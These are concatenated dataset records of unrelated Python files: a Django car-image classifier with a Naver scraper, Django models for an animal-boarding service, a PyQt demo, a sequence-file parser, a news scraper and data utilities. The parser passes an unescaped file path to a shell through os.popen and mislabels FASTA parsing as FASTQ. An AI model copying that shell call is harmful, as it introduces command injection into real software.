car_image_list, car_detail_list = car_crawling(top_3)\n \n form = ImageForm()\n context = {\n 'images':images,\n 'percent':percent,\n 'form':form,\n 'car_1_name':car_name_list[0],\n 'car_1_type':car_type_list[0],\n 'car_1_producer':car_producer_list[0],\n 'car_1_image':car_image_list[0],\n 'car_1_detail':car_detail_list[0],\n 
'car_2_name':car_name_list[1],\n            'car_2_type':car_type_list[1],\n            'car_2_producer':car_producer_list[1],\n            'car_2_image':car_image_list[1],\n            'car_2_detail':car_detail_list[1],\n            'car_3_name':car_name_list[2],\n            'car_3_type':car_type_list[2],\n            'car_3_producer':car_producer_list[2],\n            'car_3_image':car_image_list[2],\n            'car_3_detail':car_detail_list[2],\n        }\n\n        return render(request, 'result.html', context)\n    else:\n        if form.is_valid():\n            image = form.save(commit=False)\n            image.save()\n            images = Image.objects.all()\n            image_path = images[0].image\n            top_3, percent = run_inference_on_image(str(image_path))\n            car_name_list, car_type_list, car_producer_list, car_image_list, car_detail_list = car_crawling(top_3)\n\n            form = ImageForm()\n            context = {\n                'images':images,\n                'percent':percent,\n                'form':form,\n                'car_1_name':car_name_list[0],\n                'car_1_type':car_type_list[0],\n                'car_1_producer':car_producer_list[0],\n                'car_1_image':car_image_list[0],\n                'car_1_detail':car_detail_list[0],\n                'car_2_name':car_name_list[1],\n                'car_2_type':car_type_list[1],\n                'car_2_producer':car_producer_list[1],\n                'car_2_image':car_image_list[1],\n                'car_2_detail':car_detail_list[1],\n                'car_3_name':car_name_list[2],\n                'car_3_type':car_type_list[2],\n                'car_3_producer':car_producer_list[2],\n                'car_3_image':car_image_list[2],\n                'car_3_detail':car_detail_list[2],\n            }\n\n            return render(request, 'result.html', context)\n        else:\n            delete_image = Image.objects.all()\n            delete_image.delete()\n            form = ImageForm()\n            context = {\n                'form':form\n            }\n            return render(request, 'index.html', context)\n\ndef result(request):\n    return render(request, 'result.html')\n\ndef run_inference_on_image(image_path):\n    # path of the image file to run inference on\n    # image_path = './kia3.jpg'\n    # image_path = './model_360.png'\n\n    # path of the labels file to read\n    labels_txt_file_path = './output_labels.txt'\n    answer = None\n\n    # if the image file does not exist at the given path, log a fatal error\n    if not tf.gfile.Exists(image_path):\n        tf.logging.fatal('추론할 이미지 파일이 존재하지 않습니다. %s', image_path)  # 'the image file to infer does not exist'\n        return answer\n\n    # read the image file\n    image_data = tf.gfile.FastGFile(image_path, 'rb').read()\n    # build the graph\n    graph_pb_file_path = './output_graph.pb'\n    with tf.gfile.FastGFile(graph_pb_file_path, 'rb') as f:\n        graph_def = tf.GraphDef()\n        graph_def.ParseFromString(f.read())\n        _ = tf.import_graph_def(graph_def, name='')\n    # open a session and run the graph\n    with tf.Session() as sess:\n        # select the final softmax output layer\n        softmax_tensor = sess.graph.get_tensor_by_name('final_result:0')\n        # feed the image as input and get back the softmax matrix of predictions\n        predictions = sess.run(softmax_tensor, feed_dict={\n            'DecodeJpeg/contents:0': image_data})\n        # remove unnecessary dimensions\n        predictions = np.squeeze(predictions)\n        # take the indices of the 5 predictions (top 5) with the highest probabilities\n        # e.g. [0 3 2 4 1]\n        top_k = predictions.argsort()[-5:][::-1]\n\n        # load the answer labels from output_labels.txt as a list\n        f = open(labels_txt_file_path, 'r', encoding='utf-8')\n        lines = f.readlines()\n        labels = [str(w).replace(\"\\n\", \"\") for w in lines]\n\n        # collect the top inference results, starting from the highest-probability indices\n        top_3 = []\n        percent = []\n\n        idx = 0\n        for node_id in top_k:\n            idx += 1\n            label_name = labels[node_id]\n            probability = predictions[node_id]\n            top_3.append(label_name)\n            percent.append(probability)\n            if idx == 3:\n                break\n\n        # report the Top-1 inference result with the highest probability\n        answer = labels[top_k[0]]\n        probability = predictions[top_k[0]]\n\n    return top_3, percent\n\ndef car_crawling(top_3):\n    car_name_list = []\n    car_producer_list = []\n    car_type_list = []\n    car_image_list = []\n    car_detail_list = []\n    for i in range(3):\n        full_name = top_3[i]\n\n        idx = 0\n        check_list = []\n        for j in full_name:\n            if j == '_':\n                check_list.append(idx)\n            idx += 1\n        car_name = full_name[check_list[0]+1:check_list[1]]\n        car_year = full_name[check_list[1]+1:]\n\n        if car_name == 'QM6' and car_year == '2017':\n            car_year = '2016'\n        if car_name == '투싼1.7D':\n            car_name = '투싼'\n\n        car_url = 'https://search.naver.com/search.naver?sm=tab_hty.top&where=nexearch&query='+car_year+car_name\n        resp = requests.get(car_url)\n        soup = BeautifulSoup(resp.content, 'html.parser')\n\n\n        try:\n            car_name_year = soup.select('#main_pack > div.content_search.section > div > div.contents03_sub > div > div.profile_wrap > dl > dt.name > a > strong')[0].text\n            car_name_list.append(car_name_year)\n\n        except:\n            car_name_list.append(car_name + car_year)\n        try:\n            car_detail = soup.select('#main_pack > div.content_search.section > div > div.contents03_sub > div > div.profile_wrap > dl > dt.name > a')[0].get('href')\n            car_detail_list.append(car_detail)\n            detail_url = car_detail\n            resp = requests.get(detail_url)\n            soup = BeautifulSoup(resp.content, 'html.parser')\n            car_type = soup.select('#container > div.spot_end.new_end > div.info_group > span > a.weight')[0].text\n            car_type_list.append(car_type)\n            car_producer = soup.select('#container > div.spot_end.new_end > div.info_group > span > a.brand')[0].text\n            car_producer_list.append(car_producer)\n            car_image = soup.select('#carMainImgArea > div.main_img > img')[0].get('src')\n            car_image_list.append(car_image)\n\n        except:\n            # the fallback string means 'unavailable - please search on Naver'\n            car_detail_list.append('확인불가로 네이버검색 요망')\n            car_type_list.append('확인불가로 네이버검색 요망')\n            car_producer_list.append('확인불가로 네이버검색 요망')\n            car_image_list.append('확인불가로 네이버검색 요망')\n    return car_name_list, car_type_list, car_producer_list, car_image_list, car_detail_list\n","sub_path":"server/pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"221940488","text":"from enum import Enum\n\nfrom django.db import models\n\nfrom . 
import OuiNonChoice\nfrom .animaux import Animal\nfrom .proprietaires import Proprietaire\n\nclass ModeGarde(Enum):\n    ENCLOS = \"Enclos\"\n    CAGE = \"Cage\"\n\n\nclass Saison(Enum):\n    BASSE = \"Basse saison\"\n    HAUTE = \"Haute saison\"\n\n\nclass StatutSejourChoice(Enum):\n    EN_ATTENTE_VAL = \"En attente de validation\"\n    EN_ATTENTE_ARRHES = \"En attente de paiement des arrhes\"\n    A_PAYER = \"Validé - A payer\"\n    VALIDE = \"Validé\"\n    REFUSE = \"Refusé\"\n    EN_COURS = \"En cours\"\n    TERMINE = \"Terminé\"\n    ANNULE = \"Annulé\"\n\nstatuts_rouge = [\n    StatutSejourChoice.EN_ATTENTE_VAL.name,\n    StatutSejourChoice.EN_ATTENTE_ARRHES.name,\n]\n\nstatuts_vert = [\n    StatutSejourChoice.A_PAYER.name,\n    StatutSejourChoice.VALIDE.name,\n    StatutSejourChoice.EN_COURS.name,\n]\n\n# Stay statuses validated by the boarding facility, hence not editable via the app\nstatuts_valides = [\n    StatutSejourChoice.EN_ATTENTE_ARRHES.name,\n    StatutSejourChoice.A_PAYER.name,\n    StatutSejourChoice.VALIDE.name,\n    StatutSejourChoice.EN_COURS.name,\n]\n\n# Final stay statuses\nstatuts_finaux = [\n    StatutSejourChoice.REFUSE.name,\n    StatutSejourChoice.ANNULE.name,\n    StatutSejourChoice.TERMINE.name,\n]\n\n\nclass Lieu(Enum):\n    PENSION = \"A la pension (01470 Montagnieu)\"\n    REFUGE = \"Au refuge (38460 Saint-Romain-de-Jalionas)\"\n    AEROPORT = \"A l'aeroport Lyon saint exupery\"\n\n\nclass ModePaiement(Enum):\n    VIREMENT = \"Par virement\"\n    CARTE = \"Par carte\"\n    CHEQUE = \"Par chèque\"\n    LIQUIDE = \"En liquide\"\n\n\nclass Sejour(models.Model):\n    date_mise_a_jour = models.DateField(\n        verbose_name=\"Date de mise à jour\", auto_now=True\n    )\n    date_arrivee = models.DateTimeField(verbose_name=\"Date d'arrivée\")\n    date_depart = models.DateTimeField(verbose_name=\"Date de départ\")\n    lieu_arrivee = models.CharField(\n        max_length=15,\n        verbose_name=\"Lieu de dépôt au début du séjour\",\n        choices=[(tag.name, tag.value) for tag in Lieu],\n        default=Lieu.PENSION.name,\n    )\n    lieu_depart = models.CharField(\n        max_length=15,\n        verbose_name=\"Lieu de récupération à la fin du séjour\",\n        choices=[(tag.name, tag.value) for tag in Lieu],\n        default=Lieu.PENSION.name,\n    )\n    mode_garde = models.CharField(\n        max_length=15,\n        verbose_name=\"Mode de garde\",\n        choices=[(tag.name, tag.value) for tag in ModeGarde],\n        default=ModeGarde.CAGE.name,\n    )\n    saison = models.CharField(\n        max_length=15,\n        verbose_name=\"Saison\",\n        choices=[(tag.name, tag.value) for tag in Saison],\n        default=Saison.BASSE.name,\n    )\n    cohabitation = models.CharField(\n        max_length=3,\n        verbose_name=\"Séjour pour cohabitation\",\n        choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n        default=OuiNonChoice.NON.name,\n    )\n    nb_cages_fournies = models.IntegerField(\n        verbose_name=\"Nombre de cages fournies par le propriétaire \", default=0\n    )\n    nb_cages_a_fournir = models.IntegerField(\n        verbose_name=\"Nombre de cages/enclos à fournir par la pension \",\n        default=1,\n    )\n    montant = models.DecimalField(\n        verbose_name=\"Montant à payer\",\n        max_digits=7,\n        decimal_places=2,\n        blank=True,\n        null=True,\n    )\n    arrhes = models.DecimalField(\n        verbose_name=\"Montant arrhes\",\n        max_digits=7,\n        decimal_places=2,\n        blank=True,\n        null=True,\n    )\n    montant_restant = models.DecimalField(\n        verbose_name=\"Montant restant à payer\",\n        max_digits=7,\n        decimal_places=2,\n        blank=True,\n        null=True,\n    )\n    mode_paiement = models.CharField(\n        max_length=15,\n        verbose_name=\"Mode de paiement\",\n        choices=[(tag.name, tag.value) for tag in ModePaiement],\n        default=ModePaiement.VIREMENT.name,\n        blank=True\n    
)\n nb_jours = models.IntegerField()\n animaux = models.ManyToManyField(Animal)\n proprietaire = models.ForeignKey(Proprietaire, on_delete=models.PROTECT, null=True)\n vaccination = models.CharField(\n max_length=3,\n verbose_name=\"Tous les animaux du séjour sont correctement vaccinés pour toute la \"\n \"durée du séjour? (majoration de 90€ si ce n'est pas le cas) \",\n choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n default=OuiNonChoice.OUI.name,\n )\n soin = models.CharField(\n max_length=3,\n verbose_name=\"Un de vos animaux nécessite un soin quotidien (a préciser ci-dessous) \",\n choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n default=OuiNonChoice.NON.name,\n )\n injection = models.CharField(\n max_length=3,\n verbose_name=\"Le soin quotidien de votre animal se fait par injection, \"\n \"inhalation ou est nécessaire 2 fois ou plus par jour \",\n choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n default=OuiNonChoice.NON.name,\n )\n commentaire = models.CharField(\n max_length=1000,\n verbose_name=\"Indications sur le séjour (soins divers, points d'attention...)\",\n blank=True,\n )\n annule = models.BooleanField(default=False,\n verbose_name=\"Séjour annulé\")\n pension = models.BooleanField(default=False,\n verbose_name=\"Séjour de la nouvelle pension\")\n longue_duree = models.CharField(\n max_length=3,\n verbose_name=\"Séjour longue durée\",\n choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n default=OuiNonChoice.NON.name,\n )\n montant_jour_longue_duree = models.DecimalField(\n verbose_name=\"Montant quotidien pour pension longue durée\",\n max_digits=7,\n decimal_places=2,\n blank=True,\n null=True,\n )\n nb_photos = models.IntegerField(\n verbose_name=\"Nombre de séances photos et nouvelles personnalisées \"\n \"(maximum une fois par semaine, 3€/séance)\",\n default=0,\n )\n nb_griffes = models.IntegerField(\n verbose_name=\"Coupe de griffe \"\n \"(saisir 1 par animal necessitant une coupe de griffe, 5€/seance) \",\n default=0,\n )\n nb_toilettage = models.IntegerField(\n verbose_name=\"Nombre de séances de toilettage (brossage, tonte, etc...) 
\"\n \" 5€/seance \",\n default=0,\n )\n regime_verdure = models.CharField(\n max_length=3,\n verbose_name=\"Régime alimentaire 100% verdure (+1€/jour) \",\n choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n default=OuiNonChoice.NON.name,\n )\n regime_calcium = models.CharField(\n max_length=3,\n verbose_name=\"Régime alimentaire pauvre en calcium (+2€/jour) \",\n choices=[(tag.name, tag.value) for tag in OuiNonChoice],\n default=OuiNonChoice.NON.name,\n )\n statut = models.CharField(\n max_length=50,\n verbose_name=\"Statut\",\n choices=[(tag.name, tag.value) for tag in StatutSejourChoice],\n default=StatutSejourChoice.EN_ATTENTE_ARRHES.name,\n )\n\n class Meta:\n ordering = ['-date_arrivee']\n\n def __str__(self):\n if self.date_arrivee and self.date_depart:\n return f\"Séjour du {self.date_arrivee:%d/%m/%Y %H:%M} au {self.date_depart:%d/%m/%Y %H:%M}\"\n return \"\"\n\n def save(self, *args, **kwargs):\n self.nb_jours = abs((self.date_depart - self.date_arrivee).days) + 1\n return super().save(*args, **kwargs)\n\n def annulation(self):\n self.annule = True\n\n def animaux_str(self):\n result = ''\n for animal in self.animaux.all():\n result += animal.name + \", \"\n return result[:-2]\n\n def has_statut_vert(self):\n return self.statut in statuts_vert\n\n def has_statut_rouge(self):\n return self.statut in statuts_rouge\n\n def has_statut_valide(self):\n return self.statut in statuts_valides\n\n def has_statut_final(self):\n return self.statut in statuts_finaux\n\n def soins_str(self):\n if self.injection == OuiNonChoice.OUI.name:\n return \"Oui, soins lourds\"\n elif self.soin == OuiNonChoice.OUI.name:\n return \"Oui soins légers\"\n return \"Non\"\n\n def regime_str(self):\n if self.regime_verdure == OuiNonChoice.OUI.name:\n if self.regime_calcium == OuiNonChoice.OUI.name:\n return \"Régime verdure et pauvre en calcium\"\n return \"Régime verdure\"\n if self.regime_calcium == OuiNonChoice.OUI.name:\n return \"Régime pauvre en calcium\"\n return \" - \"\n\n def particularites_str(self):\n result = \"\"\n if self.regime_verdure == OuiNonChoice.OUI.name:\n result += \"Régime verdure \\n\"\n if self.regime_calcium == OuiNonChoice.OUI.name:\n result += \"Régime pauvre en calcium \\n\"\n if self.injection == OuiNonChoice.OUI.name:\n result += \"Soins lourds \\n\"\n elif self.soin == OuiNonChoice.OUI.name:\n result += \"Soins légers \\n\"\n if self.cohabitation == OuiNonChoice.OUI.name:\n result += \"Cohabitation\"\n return result\n\n def options_str(self):\n result = \"\"\n if self.nb_photos > 0:\n result += str(self.nb_photos) + \" séance(s) photo, \"\n if self.nb_griffes > 0:\n result += str(self.nb_griffes) + \" séance(s) coupe de griffes, \"\n if self.nb_toilettage > 0:\n result += str(self.nb_toilettage) + \" séance(s) de toilettage, \"\n result = result[:result.rfind(\",\")]\n return result\n\n\nclass RealisationSejour(models.Model):\n sejour = models.OneToOneField(Sejour, on_delete=models.CASCADE)\n nb_photos = models.IntegerField(\n verbose_name=\"Nombre de séances photos effectuées\",\n default=0,\n )\n nb_griffes = models.IntegerField(\n verbose_name=\"Coupe de griffe effectuées\",\n default=0,\n )\n nb_toilettage = models.IntegerField(\n verbose_name=\"Nombre de séances de toilettage effectuées\",\n default=0,\n )\n\n def get_css_class_for_photos(self):\n if self.nb_photos < self.sejour.nb_photos:\n return \"red\"\n return \"green\"\n\n def get_css_class_for_griffes(self):\n if self.nb_griffes < self.sejour.nb_griffes:\n return \"red\"\n return \"green\"\n\n def 
get_css_class_for_toilettage(self):\n        if self.nb_toilettage < self.sejour.nb_toilettage:\n            return \"red\"\n        return \"green\"\n","sub_path":"admin_interface/models/sejours.py","file_name":"sejours.py","file_ext":"py","file_size_in_byte":10606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"535718923","text":"'''\nCreated on 2017. 9. 7.\n@author: callor\n'''\n\nfrom sys import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\n\n'''\nWidget\n    all tools/widgets\n    windows, buttons, input boxes\n    window: a window can also contain other windows\n        a contained window is a Frame\n        Layout Frame\n'''\n\nclass ExamWin(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.initUi()\n\n    # method that designs the UI\n    def initUi(self):\n\n        # set the window size and position\n        self.setGeometry(300,300,300,300)\n        self.setWindowTitle(\"QT Window 연습\")  # 'QT Window practice'\n        self.show()\n\nif __name__ == \"__main__\":\n    app = QApplication(argv)    # sys.argv\n    mywin = ExamWin()\n\n#     mywin.initUi()\n    exit(app.exec_())\n","sub_path":"ClassPRJ/Class01/QtExam.py","file_name":"QtExam.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"290529109","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nimport re\n\nVALID_NUCLEOTIDES = {'A', 'a',\n                     'C', 'c',\n                     'G', 'g',\n                     'T', 't',\n                     'R', 'r',\n                     'Y', 'y',\n                     'S', 's',\n                     'W', 'w',\n                     'K', 'k',\n                     'M', 'm',\n                     'B', 'b',\n                     'D', 'd',\n                     'H', 'h',\n                     'V', 'v',\n                     'N', 'n',\n                     'X', 'x', }  # X for masked nucleotides\n\nREGEX_GZIPPED = re.compile(r'^.+\\.gz$')\n\n\ndef parse_fasta(filepath):\n    '''Parse a FASTA/FASTA.GZ file returning a generator yielding tuples of fasta headers to sequences.\n\n    Args:\n        filepath (str): Fasta file path\n\n    Returns:\n        generator: yields tuples of (, )\n    '''\n    if REGEX_GZIPPED.match(filepath):\n        logging.debug('Opening \"%s\" as gzipped file', filepath)\n        # using os.popen with zcat since it is much faster than gzip.open or gzip.open(io.BufferedReader)\n        # http://aripollak.com/pythongzipbenchmarks/\n        # assumes Linux os with 
zcat installed\n import os\n with os.popen('zcat < {}'.format(filepath)) as f:\n yield from _parse_fastq(f)\n else:\n with open(filepath, 'r') as f:\n yield from _parse_fastq(f)\n\n\ndef _parse_fastq(f):\n \"\"\"Simple FASTQ parser which yields the header and sequence ignoring the quality scores\n\n Args:\n f: file-like object\n\n Yields:\n Tuple of FASTQ entry header and sequence\n \"\"\"\n header = ''\n seq = ''\n skip = False\n for line in f:\n if skip:\n skip = False\n continue\n line = line.strip()\n if line == '':\n continue\n if line[0] == '@':\n header = line.replace('@', '')\n elif line[0] == '+':\n yield header, seq\n skip = True\n else:\n seq = line.upper()\n","sub_path":"bio_hansel/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"240661460","text":"from GoogleNews import GoogleNews\nfrom newsplease import NewsPlease\nimport requests\nimport urllib\nimport numpy as np\ndef isRedirect(url):\n\ttry:\n\t\tresponse = requests.get(url, allow_redirects=True)\n\t\tif response.url != url:\n\t\t\treturn True\n\texcept Exception as e:\n\t\treturn True\n\treturn False\ndef get_content(result):\n\ttitles = []\n\ttexts = []\n\tfor i, news in enumerate(result):\n\t\turl = news['link']\n\t\tif isRedirect(url): continue \n\t\tresponse = requests.get(url)\n\t\tif response.status_code != 200: continue\n\t\ttry:\n\t\t\tarticle = NewsPlease.from_url(url)\n\t\texcept Exception as e:\n\t\t\tcontinue\n\t\tif (article.maintext == None or article.title == None): continue\n\t\telse:\n\t\t\t#data = {\"title\":article.title,\"text\":article.maintext}\n\t\t\ttitles.append(article.title)\n\t\t\ttexts.append(article.maintext)\n\t\t\t#ret.append(article.title + article.maintext)\n\treturn (titles,texts)\n\ndef getNews(topic, start_time, end_time):\n\tgooglenews = GoogleNews(start = start_time, end = end_time)\n\ttitles = []\n\ttexts = []\n\tlabels = []\n\tfor i in range(1,2):\n\t\tgooglenews.clear()\n\t\tgooglenews.search(topic)\n\t\tgooglenews.getpage(i)\n\t\ttmp = googlenews.result()\n\n\t\t#result += [x[\"title\"]+x[\"desc\"] for x in tmp]\n\t\t(tmp_title , tmp_text) = get_content(tmp)\n\t\ttitles += tmp_title\n\t\ttexts += tmp_text\n\t\tif i == 1:\n\t\t\tlabels += [1 for _ in range(len(tmp_text))]\n\t\telse:\n\t\t\tlabels += [0 for _ in range(len(tmp_text))]\n\t#labels = np.array(labels)\n\treturn (titles , texts , labels)\n\n\n","sub_path":"getNews.py","file_name":"getNews.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"620894656","text":"from django.urls import path\r\nfrom . 
import views\r\n\r\nurlpatterns = [\r\n path(\r\n 'xlsx/////////',\r\n views.xlsx, name='report-xlsx'),\r\n path('request_summary/', views.show_request_summary, name='req_summary'),\r\n # path('pdf/', views.pdf1, name='report-pdf1'),\r\n # path('pdf1/', views.pdf, name='report-pdf'),\r\n path('view/', views.reportview , name='view_report'),\r\n]\r\n","sub_path":"report/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"241163707","text":"\nimport pandas as pd\nimport numpy as np\n\ndef wind_direction_dummies(dataframe, wind_direction, drop_energy=False):\n \n dataframe[wind_direction] = dataframe[wind_direction].apply(lambda x: '7.0' if x==360 else str(x//45))\n \n dataframe = pd.get_dummies(dataframe, columns=[wind_direction], drop_first=True)\n \n if drop_energy:\n c = list(dataframe.columns)\n c.remove('dangjin_floating')\n c = c + ['dangjin_floating']\n\n dataframe = dataframe[c]\n\n return dataframe\n\n\n\n\n\n\ndef dataframe_interpolation_by_spline(dataframe, columns):\n import time\n start = time.time()\n for column in columns:\n dataframe[column].interpolate(method='spline', order=3, inplace=True)\n print(f'processing time : {time.time()-start} s')\n\n\ndef dataframe_interpolation_by_linear(dataframe, columns):\n import time\n start = time.time()\n for column in columns:\n dataframe[column].interpolate(method='linear', inplace=True)\n print(f'processing time : {time.time()-start} s')\n\n\n\n\n\n\nfrom sklearn.preprocessing import MinMaxScaler\n\ndef dataframe_normalize(dataframe, exclude_column_list):\n \n scaler = MinMaxScaler()\n\n normalize_columns = list(dataframe.columns)\n for column in exclude_column_list:\n normalize_columns.remove(column)\n\n dataframe[normalize_columns] = pd.DataFrame(scaler.fit_transform(dataframe.drop(columns=exclude_column_list)))\n \n\n return dataframe\n\n\n\n\n\nimport matplotlib.pyplot as plt\nplt.rcParams['font.family'] = 'NanumGothic'\n\ndef hist_features(dataframe, exclude_column_list):\n\n hist_columns = list(dataframe.columns)\n for column in exclude_column_list:\n hist_columns.remove(column)\n\n n = len(hist_columns)\n\n if n < 10:\n n1 = 2\n n2 = (n // 2) + 1 if n%2 else n // 2\n else:\n n1 = 3\n n2 = (n // 3) + 1 if n%3 else n // 3\n \n \n fig, axs = plt.subplots(n1, n2)\n plt.subplots_adjust(left=0.125, bottom=0.1, right=2.0, top=1.5, wspace=0.2, hspace=0.35) \n\n\n for i in range(n1):\n for j in range(n2):\n \n if (i*n2 + j) == n : break\n\n axs[i, j].hist(dataframe[hist_columns[i*n2 + j]])\n axs[i, j].set_title(hist_columns[i*n2 + j])\n\n \n\ndef fcst_augment(dataframe):\n\n start = dataframe[\"forecast\"].iloc[0]\n end = dataframe[\"forecast\"].iloc[-1]\n\n time_index = pd.Series(pd.date_range(start, end, freq='H'), name=\"time_index\")\n\n dataframe[\"forecast\"] = pd.to_datetime(dataframe[\"forecast\"])\n dataframe = pd.merge(time_index, dataframe, how='outer', left_on=\"time_index\", right_on=\"forecast\").drop(columns=[\"time\", \"forecast\"])\n\n return dataframe\n\n\n\ndef nona_mugja(dataframe):\n\n dataframe[\"6시간강수량\"] = dataframe[\"6시간강수량\"] / 6\n dataframe[\"6시간적설\"] = dataframe[\"6시간적설\"] / 6\n \n dataframe[\"6시간강수량\"].fillna(method='ffill', inplace=True)\n dataframe[\"6시간적설\"].fillna(method='ffill', inplace=True) \n\n return 
dataframe","sub_path":"data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"492203735","text":"import turtle\n\ndef draw_shapes():\n window = turtle.Screen()\n window.bgcolor(\"black\")\n #draw_square()\n #draw_circle()\n #draw_triangle()\n\n brad = turtle.Turtle()\n brad.shape(\"circle\")\n brad.color(\"yellow\") \n\n for i in range(30):\n draw_square(brad)\n brad.right(12) \n \n window.exitonclick()\n\ndef draw_square(brad): \n for i in range(4):\n brad.forward(100)\n brad.right(90)\n \ndef draw_circle():\n angie = turtle.Turtle()\n angie.shape(\"arrow\")\n angie.color(\"blue\")\n angie.circle(100)\n\ndef draw_triangle():\n bob = turtle.Turtle()\n bob.shape(\"square\")\n bob.color(\"red\")\n\n for i in range(3):\n bob.forward(200)\n bob.left(120)\n \ndraw_shapes()\n\n","sub_path":"Lessons challenges/Intro to Python/OOP/turtles/draw_square.py","file_name":"draw_square.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"267100723","text":"import numpy as np\nimport pandas as pd\n\n#DataFrame\ndf = pd.read_csv('ecommerce_data.csv')\n\n#preview\n#print(df.head())\n\ndef get_data():\n df = pd.read_csv('ecommerce_data.csv')\n data = df.as_matrix()\n \n X = data[:, :-1]\n Y = data[:, -1]\n \n #Normalising features \n X[:,1] = (X[:,1]-X[:,1].mean())/X[:,1].std()\n X[:,2] = (X[:,2]-X[:,2].mean())/X[:,2].std()\n\n #Time of day (ONE HOT ENCODING 4 different categorical values) \n N, D = X.shape\n #print(X.shape)\n X2 = np.zeros((N,D+3))\n X2[:,0:(D-1)] = X[:,0:(D-1)]\n \n for i in range(N):\n t = int(X[i, D-1])\n X2[i,t+D-1] = 1 \n \n #other way of doing this\n #Z = np.zeros((N,4))\n #Z[np.arange(N),X[:,D-1].astype(np.int32)] = 1\n #assert this\n #assert(np.abs(X2[:,-4] - Z).sum() < 10e-10)\n return X2,Y\n\ndef get_binary_data():\n X,Y = get_data()\n X2 = X[Y<=1]\n Y2 = Y[Y <= 1]\n return X2, Y2\n\n ","sub_path":"NueralNets/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"642015257","text":"import click\nfrom pyteomics import mgf, mzml\nfrom pyopenms import *\n\nCONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])\n\n\ndef print_help():\n ctx = click.get_current_context()\n click.echo(ctx.get_help())\n ctx.exit()\n\n\ndef buid_usi_accession(cluster_id, peptide_sequence, scan, px_accession, raw_name, charge):\n usi = cluster_id + \";\" + 'mzspec' + \":\" + px_accession + \":\" + raw_name + \":\" + \"scan:\" + str(scan)\n if peptide_sequence is not None:\n usi = usi + \":\" + peptide_sequence + \"/\" + str(charge)\n return usi\n\n\ndef read_peptides(mq_msms):\n peptides = {}\n with open(mq_msms) as mq_peptides:\n next(mq_peptides) # skip header\n for line in mq_peptides:\n words = line.split('\\t')\n rscan = int(words[1])\n rpept = words[7][1:-1]\n peptides[rscan] = rpept\n return peptides\n\n\ndef read_clusters(mrcluster_clusters):\n clusters = {}\n cluster_prefix = 'cluster-'\n cluster_index = 1\n with open(mrcluster_clusters) as cluster_def:\n for line in cluster_def:\n if not line.strip():\n cluster_index = cluster_index + 1\n else:\n words = line.split('\\t')\n clusters[int(words[1])] = cluster_prefix + str(cluster_index)\n return clusters\n\n\n@click.command('convert-mq-marcluster', short_help='Command to convert MaxQuant 
Results and MaRCluster into MGF')\n@click.option('--mq_msms', '-p', help='Peptide information from MaxQuant')\n@click.option('--mrcluster_clusters', '-c', help='The information of the clusters from MaRCluster')\n@click.option('--mgf_file', '-s', help='The mgf with the corresponding spectra')\n@click.option('--output', '-o', help='Output mgf containing the cluster and the spectra information')\n@click.option('--px_accession', '-a', help='ProteomeXchange accession of the project')\n@click.option('--raw_name', '-r', help='Original name of the RAW file in proteomeXchange')\ndef convert_mq_mracluster_mgf(mq_msms, mrcluster_clusters, mgf_file, output, px_accession, raw_name):\n    if mq_msms is None or mrcluster_clusters is None or mgf_file is None:\n        print_help()\n\n    # Read the input spectra\n    input_spectra = mgf.read(mgf_file)\n    spectra_list = list(input_spectra)\n    print('Number of Spectra: ' + str(len(spectra_list)))\n\n    # Read the msms.txt file. For now, the peptides will be a dictionary where the key is the scan number\n    # and the value is the peptide sequence. We need to be aware that we can have cases when one scan can be associated with more\n    # than one peptide sequence\n\n    peptides = read_peptides(mq_msms)\n    print('Number of Peptides: ' + str(len(peptides)))\n\n    # Read clusters, the clusters will be a map where the key is the scan and the value is the cluster where the scan belongs\n    clusters = read_clusters(mrcluster_clusters)\n    print(\"Number of Clusters: \" + str(len(clusters)))\n\n    for scan in clusters:\n        print('scan: ' + str(scan))\n        for spectra in spectra_list:\n            if spectra['params']['title'].endswith('scan=' + str(scan)):\n                cluster_accession = clusters[scan]\n                if scan not in peptides:\n                    peptide_sequence = None\n                else:\n                    peptide_sequence = peptides[scan]\n                charge = int(spectra['params']['charge'][0])\n                spectra['params']['title'] = buid_usi_accession(cluster_accession, peptide_sequence, scan, px_accession,\n                                                                raw_name, charge)\n                mgf.write([spectra], output)\n\n\n@click.command('convert-mq-marcluster-mzml', short_help='Command to convert MaxQuant results and MaRCluster into mzML')\n@click.option('--mq_msms', '-p', help='Peptide information from MaxQuant')\n@click.option('--mrcluster_clusters', '-c', help='The information of the clusters from MaRCluster')\n@click.option('--mzml_file', '-s', help='The mzML file with the corresponding spectra')\n@click.option('--output', '-o', help='Output mzML containing the cluster and the spectra information')\n@click.option('--px_accession', '-a', help='ProteomeXchange accession of the project')\n@click.option('--raw_name', '-r', help='Original name of the RAW file in proteomeXchange')\ndef convert_mq_mracluster_mzml(mq_msms, mrcluster_clusters, mzml_file, output, px_accession, raw_name):\n    if 